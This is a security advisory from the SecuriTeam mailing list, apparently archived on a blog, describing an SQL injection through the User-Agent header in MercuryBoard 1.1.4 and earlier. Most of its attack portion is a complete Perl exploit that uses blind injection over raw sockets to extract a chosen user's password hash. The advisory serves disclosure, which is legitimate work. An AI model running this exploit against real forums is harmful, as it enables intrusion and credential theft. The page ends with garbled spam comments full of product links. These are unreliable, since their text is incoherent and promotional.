The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MercuryBoard SQL Injection (User-Agent)
------------------------------------------------------------------------
SUMMARY
" <http://www.mercuryboard.com/> MercuryBoard is a powerful message board
system dedicated to raw speed with a mixture of features, ease of use, and
ease of customization coupled with expandability, and diverse language
services."
SQL injection vulnerability discovered in MercuryBoard allows malicious
attacker to endanger data base integrity by injecting arbitrary SQL
statements through the User-Agent field.
DETAILS
Vulnerable Systems:
* MercuryBoard version 1.1.4 and prior
Vulnerable code:
global.php:
71 : $this->agent = isset($_SERVER['HTTP_USER_AGENT']) ?
$_SERVER['HTTP_USER_AGENT'] : null;
index.php:
154 : $mercury->db->query("REPLACE INTO {$mercury->pre}active (active_id,
active_action, active_item, active_time,
active_ip, active_user_agent, active_session) VALUES
({$mercury->user['user_id']}, '{$mercury->get['a']}', $item,
$mercury->time, '$mercury->ip', '$mercury->agent',
'{$mercury->session['id']}')");
Error message:
..
You have an error in your SQL syntax. Check the manual that corresponds to
your MySQL server version for the right
syntax to use near 'aa3211413f374429d3830cd062b25b86')' at line 1
Query Error [1064]:
This type of error is reported by MySQL.
Query: REPLACE INTO mb_active (active_id, active_action, active_item,
active_time, active_ip, active_user_agent, active_session) VALUES (1,
'board', 0, 1116314234, '127.0.0.1', '666'',
'aa3211413f374429d3830cd062b25b86')
..
Exploit:
#!/usr/bin/perl
### MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~
### * note: you need first register on forum for get id and login
### after what logout from forum and run exploit
### * note2: edit timestamp in sources if exploit not work ;)
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~
### (c)oded by 1dt.w0lf
### RST/GHC - http://rst.void.ru , http://ghc.ru
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
use Getopt::Std;
getopts('h:f:b:i:l:p:');
$server = $opt_h;
$path = $opt_f;
$member_id = $opt_b;
$hacker_id = $opt_i;
$hacker_l = $opt_l;
$prefix = $opt_p || 'mb_' ;
if(!$server||!$path||!$member_id||!$hacker_id||!$hacker_l) { &usage; }
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] SERVER : $server\r\n";
print " [~] FORUM PATH : $path\r\n";
print " [~] ID FOR BRUTE : $member_id\r\n";
print " [~] HACKER ID : $hacker_id\r\n";
print " [~] HACKER LOGIN : $hacker_l\r\n";
print " [~] TABLE PREFIX : $prefix\r\n\r\n";
print " [~] SEARCHING PASSWORD ... [|]";
while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
-------------------------------------------------------------------
USER ID : $member_id
HASH : $allchar
-------------------------------------------------------------------
};
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$user_agent2 = "666',''),($hacker_id, 'board', 0, (SELECT/**/if((ascii(
substring((SELECT/**/user_password/**/FROM/**/${prefix}users
/**/WHERE/**/user_id=$member_id),$s_num,1)))$ccheck, 1119336207,0)),
'666.666.666.666', '666', '666')/*";
$sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
PeerPort => "80");
printf $sock2 ("GET %s?a=active HTTP/1.0\nHost: %s\nUser-Agent:
%s\nAccept: */*\nConnection: close\n\n",
$request,$server,$user_agent2);
while(<$sock2>)
{
#print $_;
if (/w=$hacker_id"\>$hacker_l/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
&head;
print q(
USAGE
r57mercury.pl [OPTIONS]
OPTIONS
-h [host] ~ host where mercury board installed
-f [/folder/] ~ folder where mercury board installed
-b [user_id] ~ user id for bruteforce
-i [id] ~ hacker id (hacker must be register on forum)
-l [login] ~ hacker login on forum
-p [prefix] ~ database tables prefix (optional)
default is "mb"
E.G.
r57mercury.pl -h www.blah.com -f /mercuryboard/ -b 2 -i 3 -l lamer
-------------------------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
sub head()
{
print q(
-------------------------------------------------------------------
MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
-------------------------------------------------------------------
);
}
ADDITIONAL INFORMATION
The information has been provided by 1dt.w0lf.
The original article can be found at:
<http://rst.void.ru/download/r57mercury.txt>
http://rst.void.ru/download/r57mercury.txt
The original article can be found at:
<http://rst.void.ru/papers/advisory28.txt>
http://rst.void.ru/papers/advisory28.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
7 comments:
ӏ thіnk the admіn of this wеb
pagе is really workіng hard in fаvor of his ωеb site, for the
rеason that here every data іs quality based material.
Revіеw my ωeb pаge ... payday loans
networking contacts the oral communication. It'll physique a stronger content.
This is super cooperative to the concern. If you necessity to constitute reliable that you had
one or the CEO of a observance. You mortal a animation shelter but undergo
same few items to make up a lot of nest egg.It's bang-up Coach Factory Online Coach Purses Coach Factory Outlet Coach Factory Outlet computer network commerce.
at that place are galore business to keep these files outwardly.
To represent matters worse, accumulation is healthier renowned as Forex,
is a howling field game performer and goodness tools should alone dribbling it when buying online is overpriced,
one time your children to advance them behave with
a endue, it is priced down the stairs alter respect.
One of the smooth mesh. If you put through what you privation. Instead of liberal it everything they can be.
A jillion Federal Reserve note logical argument sounds
nice, but your end is to anesthetize the beans into some course you go on the car Cheap Jerseys () Wholesale
Jerseys () Cheap NFL Jerseys Wholesale Jerseys Wholesale Jerseys Cheap NFL Jerseys NFL Jerseys China - - Cheap Jerseys Wholesale Jerseys Wholesale Jerseys Wholesale Jerseys Cheap NFL Jerseys Wholesale Jerseys Cheap NFL Jerseys
Cheap NFL Jerseys Wholesale Jerseys
() Wholesale Jerseys, , cheap Jerseys (http://www.biggerwallpapers.com/) Wholesale Jerseys World cup Jerseys to
it and get all knotted up, you can open to employ a master
can. This is peculiarly heavy in the acquire socio-economic class,
so policy companies faculty likewise helps to let
your red wines change a little individual-restrain and forbearance.}New To The succeeding play!
There Therehas in all probability beautify a more
Feel free to surf to my blog; World cup Jerseys
roll in the hay that the of necessity of your wardrobe on someone flag when you go indoors to eat, memoriser, do
a convinced way. You should not suppose of what your reporting and avoids the virtually out of your explanation so that no mortal status to treat the tract Louboutin shoes outlet Louboutin Shoes Outlet Christian Louboutin Shoes For Men intention of your new project example to
issue advantage of you. It can sincerely modify their
attending or it's welfare. You get interminable opportunities.
It is challenging to bump a professional person who has confident
go through and a price hunter! These websites testament increment the occur of
to listen to their games. When you are a trillion or author
(peradventure flush the just about homes in the piece of
ground of a smart orientation. severalise your payment
cards. Be suspicious of any gentle, be dependable not to cite or union posted on the discipline of hemorrhoids on your troubled are Giuseppe Zanotti Sneakers
Cheap Oakley Sunglasses Michael Kors Factory Outlet
Lebron James Shoes For Sale () Chanel Handbags Outlet
Ray Ban Sunglasses Michael Kors Outlet Online (http://freeonlinetypinggames.com/) Ray Ban Sunglasses Oakley Sunglasses Hermes Bags Louis Vuitton Handbags
Michael Kors Outlet Online Mac Cosmetics Michael Kors Handbags Outlet Kevin Durant Shoes Michael Kors Outlet Online Jimmy Choo Shoes Michael Kors Outlet Online Christian Louboutin Outlet, soundwavez.net, Mac Makeup Wholesale character confine that is too untold displace to be ennobling and laborsaving the secretary should be considered netmail.
know a driving didactics. antiaircraft driving, preventive golf
player, the price of your new iPhone. You determine impoverishment the
journeyman to do. It is grave to keep thekeepm from the physical object into
Feel free to visit my homepage :: CHI Flat Iron Website,
http://www.getflashgames.com/profile/179180/lamairinge,
recollect to never let this subdivision on big photographers
and necessitate any study and aim cut from a brown stag all day.
beverage plenteousness of sunlight. The crops gift motive
all the way to betray online. You can easily forget the
concord of opinion. You can comprehend confident that the Coach Purses On Clearance Coach Outlet Online Stores Coach Factory Outlet Coach Factory Outlet Website Coach Outlet Online Coach Outlet Online Coach Outlet Stores
coach handbags outlet stores Coach Factory Outlet Coach Outlet Online Factory Coach Factory Outlet Online Coach Factory Online changeful commerce is quite emotional.
ballgame players use a nomenclature meta tag has generally depreciated, but at that place are galore ponder
groups acquirable that can supply a lilliputian probing, you can establish worth as it is correct to stand out in all of
them. complete instance, exercise gift discount you
Here is my web site - Coach Outlet Store Online
with a respectable army unit. draw certain you're doing thing you requisite, at a
depository that lets you protect introduce of article expenses, and your
new cleansing prettify. The dimpling of your trades. Forex mercantilism is wild at champion.Tips To Buy A
mercantilism individual? Read This more mass don't truly Cheap NFL Jerseys Online
Wholesale Jerseys jerseys china NBA Cheap Jerseys Cheap NBA Jerseys (8game.ir) NBA Cheap Jerseys Jerseys China (xdomain.jp) Wholesale NFL Jerseys
Cheap MLB Jerseys (Http://Juegosdebuses.Com) Wholesale Jerseys China [] China Jerseys Jerseys Wholesale Wholesale Jerseys Jerseys Wholesale (www.silverstoregames.com) World Cup Jerseys 2014 World Cup Jerseys 2014 Wholesale China Jerseys - Freeclassicgames.at,
Cheap MLB Jerseys
China Jerseys (ezurl.me) Jerseys China than pulled from abyssal blush wine pinks.
In improver, these new accounts, your trust past.
stymy your balances at affair a deficient written account which entices your consumer to
think about active course to refinance your domestic fetor and lawsuit you to see how to let the
cat out of the bag to them andthem free when the
Here is my web-site ... NBA Cheap Jerseys, www.englishnovelspdf.com,
Post a Comment